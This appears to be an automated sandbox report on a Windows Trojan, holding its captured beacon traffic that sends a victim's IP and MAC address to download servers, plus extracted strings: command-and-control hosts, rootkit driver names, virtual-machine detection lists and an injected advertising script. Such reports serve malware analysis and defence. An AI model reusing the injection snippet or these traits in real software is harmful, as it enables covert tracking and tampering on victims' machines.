./....E..t.V._.l...?.r^..]........Gj.h.`.._.%.M].G....L.....E.......%B
H..3...R.V.E.VW......}.j..u...V......0.F.....F...E...F.......`.3..F...
..f.F..E...F.f.F .E...F$.F(.E...F,.F0.E....u0.E..E...J.P.M.....K.p..E.
.#J......E.h..[.P.ID..WV.4R.....S..?.._^.M.3......J.....P...........{.
!..m.......F,..t.P.....0.F,.....2.F$...k........2.F....P....6.B..F....
5...>..Z.2.F........j.bE...F...#..........X..5U....S.....*U....<<< skipped >>>
GET /txt/whitelist.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:33 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes/uOrJJOQ0bgY9jPW9p1UwzlabyskyS1ciztzZWKoyggyuwDxnQlnFOPszhAwXEvEP4Ro1Y
e5GacBBM2ZDNbUU Fc3f8HO2qyXYpVEjVFoWD25ZqPJsCD8qOAB wgCXdRc0XuI/c7plLE
Onja3WJ0VzSoUtOuytBo9YwHKaDQwFJ/phDpH1RmCT0PpVHeHte0bQ6FPVVO1cDEHLrc9h
subAeFdijjIAUPWLKAHfO1qSVWKjPB8v18PmI56rTDucF0jCYIsKUbX/gtuw1a 1n5bL6d
hDiuNvG0kRhtox0AybwbErVMBK4XrK1obf LTAlyy77 sTZ3l0ESrpR2HHdxDEue6pcfMR
hz0ZQahWmq8610CX29zZYVFy8H4hihJB2wjmGLCcv6NV ggd gsC/STce7Pnc19RuUC8HV
CyN90N9Y87b4rbC PHFnT9tYDoFGmyyJgRwnmH04MROJDdJzbnxsJeuN tjovl57mS39 U
IxrLwWibnt/RUpHPDIFivoP1rZPgoyGyE95m/oQtasAP8QFwrqal0MMZjhYDvG0wCByOT9
AZLpjIdm4QwX2q1Z1EwLsRa/RJB4wvPvo42hN5l9kVaqbU rcG/IZZBR CayLrkJrly/6p
sVd4mRXOidYZdVeLWvHQjqVz0y6m VA2VnWwIEb3UeVG4pHbf1sFsTIRUyA8yri1qFQdgI
LxA C5RvEeLlw i9JjXOrCss4pbS7Gn3dTZPy7kD7aptBNwBZ8AXyqK1lu iWTl/ WkoR9
Sj3yWf5MVOHoX0VXWWxQot2/8PHlSQzDVv 2De/01k1xpsCsqniIqyltVIso5nGBEpRygN
WYEN9vdk1sZugGX007PYU1RmkDJowgiCqQE3Z S8bBaOD46ikCWqMp0G9E1AeswK2Fz55z
wjKvkukxSlQ 11kwxCgKRMANZGEOBE5zuEAYr1tXJIAKEkCyHgSEhnCcSms7bXzTZ K xa
vSklFGxxJoPGgbM9ntFXfCfCSVEg/75DV2dtPnAVPulvRG6ad9b/psmHQ87Ydux5R4neby
iCGAe8dJXk ozRC7esRpe37G1KTy67ti3mGCfv3XaFfzEDCXAQJDXzydYGwzFbufHoC6Ob
a8MBykz0IRvTgoHtzTpc3irGlZlpVdPKLzftyFBXGFSCa8DGCYXvpqdbfgQF2RpFckUmT0
1I13SJamGR957aQ7zoWd2xRg0TSaLDSO1iVXspPs40FHsQj/U4VK wzXHEoiyLu19qAK1i
mxhLpQKlr3uOju wkOjTY2vzdHLI3adsBo8YTrxVZb9db1HdkTNRFco46wqEOgw2Ieq je
NXWMXndNju7gbC3N7/5twJIkqZFt6MP8 y28KrDOB/DYFOHqYtthS4UvBZQwGyAukrufTR
bs3BENArT3eDtQ2sAZJu2SAkVick9vQughZJetuuHbPMUbUJifqAy131nC6fgdmPhUNapa
jXDdjBC1GNg7iHk7hQ/w3CkcoEtqSGlGA49EyNV7bwAGoVc7x/Xb8eCvC/nt4eeGsW<<< skipped >>>
GET /txt/popup_20150414.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=545EB4FE6391624B14A14B0DA1B44223 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/html
Content-Length: 747
Connection: close<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>
..<head><title>404 Not Found</title></head>..
<body bgcolor="white">..<h1>404 Not Found</h1>..<p
>The requested URL was not found on this server. Sorry for the inco
nvenience.<br/>..Please report this message and include the foll
owing information to us.<br/>..Thank you very much!</p>..
<table>..<tr>..<td>URL:</td>..<td>hXXp://
ln.p2ptool.com/txt/popup_20150414.txt?ver=3.180&uid=zynet.4&li
p=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=
545EB4FE6391624B14A14B0DA1B44223</td>..</tr>..<tr>..
<td>Server:</td>..<td>localhost.localdomain</td>
..</tr>..<tr>..<td>Date:</td>..<td>201
5/06/03 10:46:18</td>..</tr>..</table>..<hr/>P
owered by Tengine/2.0.2</body>..</html>....
GET /txt/First_20150519.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 185696
Last-Modified: Tue, 19 May 2015 04:05:51 GMT
Connection: close
ETag: "555ab69f-2d560"
Accept-Ranges: bytesnHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJrPpIprWhJ2tPlAWn5 TjuztACdIRySqDk4MSimn
Tp7Za1Le92vuezrOyB4j/JVkCCgW5ce60uh313VwRVQB2SErOAjo8XcQ2WTk w36cDu4SJ
AaYIwk4/xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH32nMDkPr o8n05oDilNe
9ohcLeJfUZLUAxjJhcXsCVRzZRGqugj1TL1tXZUFbwHFHnTppb1vpUZub8fxolpGyp5vx/
GiWkbKmJMRiA8G3nBa2Pi04AYpQX6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI W
vHDXnxMFqqR8/kuGsSG23HxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrgxx16VQkub/E2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr9VHGe2k 9RJcWz6ytVaQ5/E2s0NmUj5azE4dSQE
6hF3aV6mEpZjZPX2q/qmcTWzkmR2fA/LXFaCxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWi8
kaOaFmzJl6VALS5kB2H8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWBrfwq59iIOLC0tZfeza
JwrE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8Ta
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSP
lrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr<<< skipped >>>
GET /txt/urlnav_141114.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 111288
Last-Modified: Fri, 14 Nov 2014 03:29:19 GMT
Connection: close
ETag: "5465770f-1b2b8"
Accept-Ranges: bytes
<<< skipped >>>
GET /plus/config/zynet.4.bin?ver=3.180&lip=192.168.25.207&mac=000C298E22D8 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: plus.zzinfor.cn
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.3
Date: Wed, 03 Jun 2015 02:46:14 GMT
Content-Type: application/octet-stream
Content-Length: 1351
Connection: close
Expires: Wed, 03 Jun 2015 02:46:14 GMT
Cache-Control: max-age=0
<<< skipped >>>
GET /txt/ndis500_201506021708.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=7CB8231FE216E8F14A76B6A891124D85 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:23 GMT
Content-Type: text/plain
Content-Length: 349276
Last-Modified: Tue, 02 Jun 2015 09:08:27 GMT
Connection: close
ETag: "556d728b-5545c"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/listbc_20150602170806.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=E80C963847ACDC40BDEC9EB688A407E8 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 732892
Last-Modified: Tue, 02 Jun 2015 09:08:07 GMT
Connection: close
ETag: "556d7277-b2edc"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/miniIE_150427.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:29 GMT
Content-Type: text/plain
Content-Length: 1594720
Last-Modified: Mon, 27 Apr 2015 08:27:28 GMT
Connection: close
ETag: "553df2f0-185560"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/listtl_20150529180255.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=6423EAD7B80B4C2B14DA89161EFECBB4 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:22 GMT
Content-Type: text/plain
Content-Length: 16040
Last-Modified: Fri, 29 May 2015 10:02:55 GMT
Connection: close
ETag: "5568394f-3ea8"
Accept-Ranges: bytes
<<< skipped >>>
The Trojan connects to the servers at the following location(s):
cS\%Xc
f9z.vk
CCmdTarget
CNotSupportedException
commctrl_DragListMsg
COMCTL32.DLL
ole32.dll
__MSVCRT_HEAP_SELECT
user32.dll
omdlg32.dll
SHELL32.dll
OLEPRO32.DLL
WINMM.dll
svchost.exe
.rsrc
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
KERNEL32.DLL
ADVAPI32.dll
IPHLPAPI.DLL
MSWSOCK.dll
PSAPI.DLL
SHLWAPI.dll
USER32.dll
VERSION.dll
WININET.dll
WS2_32.dll
RegCloseKey
ShellExecuteW
.text
`.rdata
@.data
\\.\SSDTProcess
HideSys.sys
\\.\FixTool
Restore.sys
GetProcessHeap
WinExec
KERNEL32.dll
RegOpenKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
RegFlushKey
RegCreateKeyExA
iphlpapi.dll
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
GetCPInfo
WINDOWS\
F5A937EE-621D-4F66-8020-AB9D5FA1C357
first.exe
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
XXXXXX
%s\Connection
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
ddddddd
flist.bin
cmd.exe /c del
XXXXXXXXXXXXXXXX
hXXp://
ATL:X
msvcrt
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExW
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeW
TenSafe_1.exe
TenSafe.exe
CreateService Fail %x
OpenSCManager Fail %x
KStartServices end x
QueryServiceStatus Fail %x
QueryServiceStatus x
StartService~ x
115.238.251.56
log.soomeng.com
VVV.4278.cn
log.zzinfor.cn
127.0.0.1
zcÁ
h.rdata
H.data
.reloc
E:\CODE_P~1\p2p\HideSys\objfre\i386\HideSys.pdb
ntoskrnl.exe
hxdnetmon.sys
E:\New\MINIEP~4\sys\Driver\objfre\i386\FixTool.pdb
HAL.dll
hXXp://VVV.92zy.com/asb/apro.jpg
92tezheng.ma
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
{00000117-0000-0000-C000-000000000046}
ntdll.dll
gdi32.dll
adpro.cn
163.com
126.com
baidu.com
123.sogou.com
hXXps://
VVV.sohu.com
VVV.sina.com
hao123.com
tmall.com
if (!document.body) return setTimeout(arguments.callee, 100);
var adpro= document.createElement('script');adpro.type = 'text/javascript';
adpro.text = '_adpro_pub= "9959fcb4681e1d19d755";';
adpro.text = '_adpro_slot= "0bbbc79f00c47aa6e562";';
document.body.insertBefore(adpro, document.body.children.item(0));
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
<button name="myad" style="display: none" onclick=" eval(document.getElementById('aa').innerHTML);">Test</button>[email protected]
atl.dll
kernel32.dll
Kernel32.dll
program internal error number is %d.
:"%s"
:"%s".
.?AVCCmdTarget@@
.PAVCException@@
.?AVCCmdUI@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCUserException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
c:\%original file name%.exe
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
CreateDialogIndirectParamA
SetWindowsHookExA
GetKeyState
UnhookWindowsHookEx
ATL.DLL
COMCTL32.dll
GDI32.dll
OLEAUT32.dll
oledlg.dll
WINSPOOL.DRV
2015.1.20.1
2.0.0.1
1, 5, 1, 1516
1, 0, 0, 444
\Driver\Tcpip
%original file name%.exe_996_rwx_00401000_000C7000:
svchost.exe_3088:
.text
`.rdata
@.data
.rsrc
@.reloc
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
cmd.exe
GetProcessWindowStation
operator
MaxPolicyElementKey
pExecutionResource
e:\work\hera\src\common\norm\include\norm\third_party\jsonxx.h
[JSONXX] expression '%s' failed at %s:%d ->
HTTP/1.0 200 OK
Server: HTTPServ/1.0
Content-Type: %s
Content-Length: %d
HTTP/1.0 404 NOT FOUND
<body><h3>The requested URL <font color="red">%s</font> was not found on this server. </h3></body></html>
.html
.jpeg
.json
u.raidmedia.com.cn
update.bainv.net
u.yizuya.com
p.raidmedia.com.cn
tactics.bainv.net
p.yizuya.com
: %s, %s
hera::bi::ReportDataFilter
bi_logic.cc
0.0.0.0
, listen port = %d
hera::bi::Controller::StartTcpServer
[%s - %s] - error code: x
%s:%d(%d)
, cmd:%s
HTTP REQUEST: %s
hera::bi::Controller::OnHttpRequest
{1A1DEA10-5436-4F76-8881-09EF2F713FE8}
{336B8F76-EBF2-431C-9F97-D43ACF2EB81F}
{EF12E22B-3D97-4823-B515-B318BA276A1B}
update_port
tactics_port
l.raidmedia.com.cn
log_port
udp_port
tcp_port
http_port
ddraw.dll
clsmn.exe
pubwinClient.exe
runme.exe
adsec.exe
NSdominatsd.exe
rwyNCMc.exe
UDO.EXE
BarClientView.exe
BarClient.exe
ebClnt.exe
HintClient.exe
eyuscore.exe
eyoorun.exe
I8DeskCliSvr.exe
knbclient.exe
nxpauxsvc.exe
cfgcli.exe
clisvc.exe
BarClientPP.exe
UCheck.exe
RzxMon.exe
RzxClient.exe
wxGlw2CltPlg.wxe
MainPro.exe
JWXFClient.exe
env.cc
vboxtray.exe
vboxservice.exe
vmwareuser.exe
vmwaretray.exe
vmupgradehelper.exe
vmtoolsd.exe
vmacthlp.exe
%s, %s, %s, %s, %s, %s
%s, %s, %s, %s, %s, %d, %d,
upx result: %d
hera_interface.cc
\log.dat
iphlpapi.dll
GetExtendedTcpTable
Psapi.dll
d-d-d d:d:d %s
nbvm_console.cc
hera::bi::Master::CreateUdpListener
nbvm_entry.cc
%d, %d, %d
%d, HTTP
hera::bi::Master::HandleCmdQueryResource
P2SP url
- url: %s, hash: %s
hXXp://%s:%d%s
E:\work\hera\src\common\norm\include\norm/third_party/jsonxx.h
p2sp.cc
hera::p2sp::P2SPClient::HandleCmdReplyResource
%s:%d
tactics_requester.cc
/{1A1DEA10-5436-4F76-8881-09EF2F713FE8}
has<T>(key)
updater.cc
rename_error_and_exec_new_error
[%s] [%s] [%d]
[%s] [%s]
hera::bi::Updater::ExecUpdate
[%s] - [%s]
\\.\nbvm_core_cdo
[u-u-u u:u:u.u]
[u:u:u.u]
[x]
[%s:%d]
%s%s%s%s%s%s
%d.%d.%d.%d
X-X-X-X-X-X
d-d-d d:d:d
create tcp handle failed: not enough memory.
norm::net::iocp::ResManager::TcpCreate
..\iocp\res_manager.cc
new_handle: %u
send tcp handle: %u packet failed: invalid parameter.
norm::net::iocp::ResManager::TcpSend
send tcp handle: %u packet failed: no such handle.
async tcp socket send buffer failed: not created.
norm::net::iocp::TcpSocket::AsyncSend
..\iocp\tcp_socket.cc
async tcp socket send buffer failed: not connected.
async tcp socket send buffer failed: invalid parameter.
WSASend failed, error code: %d.
E:\work\hera\Bin\nbvm.pdb
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
SHLWAPI.dll
WS2_32.dll
IPHLPAPI.DLL
PSAPI.DLL
VERSION.dll
SETUPAPI.dll
MSWSOCK.dll
GetCPInfo
GetWindowsDirectoryW
CreateIoCompletionPort
HttpQueryInfoA
InternetOpenUrlA
InternetCrackUrlA
WININET.dll
zcÁ
.reloc
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
<[email protected]>
hXXp://VVV.oberhumer.com $
94 PEIMPORT 00000030 00000000 00000000 000019e3 2**0 CONTENTS, RELOC, READONLY
100 PEIEREXE 00000006 00000000 00000000 00001a4b 2**0 CONTENTS, RELOC, READONLY
00000000 l d PEIMPORT
00000000 PEIMPORT
00000000 l d PEIEREXE
00000000 PEIEREXE
00000000 xor_key4
00000000 xor_key3
00000000 xor_key2
00000000 xor_key1
00000000 compressed_imports
00000000 start_of_imports
00000003 R_386_32 xor_key4
00000008 R_386_32 xor_key3
0000000d R_386_32 xor_key2
00000012 R_386_32 xor_key1
RELOCATION RECORDS FOR [PEIMPORT]:
00000002 R_386_32 compressed_imports
00000016 R_386_32 start_of_imports
00000015 R_386_PC32 PEIMPORT
RELOCATION RECORDS FOR [PEIEREXE]:
%*d 23s %x %*d %*d %x 2**%d
%x g *ABS* %x 23s
%x%*c%*c%*c%*c%*c%*c%*c%*c 23s %*x 23s
%x ™s 23s
000000000
unknown section %s
unknown symbol %s
undefined symbol '%s' referenced
can not apply reloc '%s:%x' without section '%s'
defineSymbol: symbol '%s' is *ABS*
defineSymbol: symbol '%s' already defined
%-28s 0xx | %-28s 0xx
%-42s%-28s 0xx
unknown relocation type '%s
target out of range (%d,%d,%d) in reloc %s:%x
TLS callbacks are not supported
unsupported resource structure
3/%u,
i386-win32.pe
KERNEL32.DLL
PEIEREXE
PEIMPORT
win32/native applications are not yet supported
win32/os2 files are not yet supported
win32/posix files are not yet supported
PE32/wince files are not yet supported
PE32/EFIapplication files are not yet supported
PE32/EFIbootservicedriver files are not yet supported
PE32/EFIruntimedriver files are not yet supported
PE32/EFIROM files are not yet supported
PE32/xbox files are not yet supported
PE32/windowsbootapplication files are not yet supported
.NET files (win32/.net) are not yet supported
filealign < 0x200 is not yet supported
writeable shared sections not supported (try --force)
xor_key1
xor_key2
xor_key3
xor_key4
start_of_imports
compressed_imports
MSVCR100.dll
_malloc_crt
_amsg_exit
_crt_debugger_hook
UPXLib.dll
4!4%4)4-4
.?AVunsupported_os@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVHTTPClient@@
.?AVHTTPServer@@
.?AVinvalid_operation@Concurrency@@
.?AV?$_Ref_count@VUdpSocket@iocp@net@norm@@@std@@
.?AV?$_Ref_count@VTcpSocket@iocp@net@norm@@@std@@
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\26279\svchost.exe
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
combase.dll
Ekernel32.dll
_ADVAPI32.DLL
mscoree.dll
USER32.DLL
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
sadvapi32.dll
portuguese-brazilian
..\common\norm\include\norm\third_party\jsonxx.cc
ESoftware\Classes\CLSID\{A4FC6719-AFD5-4F8E-8138-B35FA78CD671}
\StringFileInfo\xx\ProductName
\StringFileInfo\xx\ProductVersion
%d.%d-x%d
SOFTWARE\Classes\http\shell\open\command
%s %s
%s,%s,%s,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d
%s-dddddd.log
Badvapi32.dll:
ntdll.dll
c0.0.0.0
uuu.nbl
*.nbl
%suuu.nbl
Assertion failed: %s, file %s, line %d
compress.cpp
compress_lzma.cpp
cresult->result_lzma.pos_bits == (unsigned) s.Properties.pb
cresult->result_lzma.lit_pos_bits == (unsigned) s.Properties.lp
cresult->result_lzma.lit_context_bits == (unsigned) s.Properties.lc
cresult->result_lzma.num_probs == (unsigned) LzmaProps_GetNumProbs(&s.Properties)
s.dicPos <= *dst_len
file.cpp
filter.cpp
filters[index].id == id
h:\d\code2\upx\upx-3.08-src\src\filter/sub8.h
h:\d\code2\upx\upx-3.08-src\src\filter/sub16.h
h:\d\code2\upx\upx-3.08-src\src\filter/sub32.h
h:\d\code2\upx\upx-3.08-src\src\filter/cto.h
h:\d\code2\upx\upx-3.08-src\src\filter/ctoj.h
h:\d\code2\upx\upx-3.08-src\src\filter/ctok.h
h:\d\code2\upx\upx-3.08-src\src\filter/ctojr.h
h:\d\code2\upx\upx-3.08-src\src\filter/ppcbxx.h
linker.cpp
mem.cpp
packer.cpp
ph.level >= 1
ph.level <= 10
cconf.conf_ucl.max_offset == 0 || cconf.conf_ucl.max_offset >= ph.max_offset_found
cconf.conf_ucl.max_match == 0 || cconf.conf_ucl.max_match >= ph.max_match_found
(int)ph.overlap_overhead > 0
opt->cmd == CMD_COMPRESS
isValidCompressionMethod(ph.method)
1 <= ph.level && ph.level <= 10
isValidFilter(ph.filter)
orig_ph.filter == 0
orig_ft.id == 0
best_ph.filter == best_ft.id
best_ph.filter_cto == best_ft.cto
best_ph.overlap_overhead > 0
packer_c.cpp
packer_f.cpp
packhead.cpp
h:\d\code2\upx\upx-3.08-src\src\util.h
pefile.cpp
ppi < oimport soimport
exports - newbase == (int) size
p_w32pe.cpp
n <= oh.filealign
h:\d\code2\upx\upx-3.08-src\src\bptr.h
base_ == other.base_
size_ == other.size_
snprintf.cpp
2015.4.2.1
2.0.0.1
Cattle.exe_2188:
`.rsrc
CNotSupportedException
CHttpFile
hXXp://
kernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
RegOpenKeyTransactedA
Advapi32.dll
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
ole32.dll
RegDeleteKeyExA
user32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
MFCLink_UrlPrefix
MFCLink_Url
Shell32.dll
%s:%x:%x:%x:%x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
&%d %s
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
ShowCmd
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
%sPane-%d%x
%sPane-%d
%c%d%c%s
RGB(%d, %d, %d)
%sBasePane-%d%x
%sBasePane-%d
windows
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
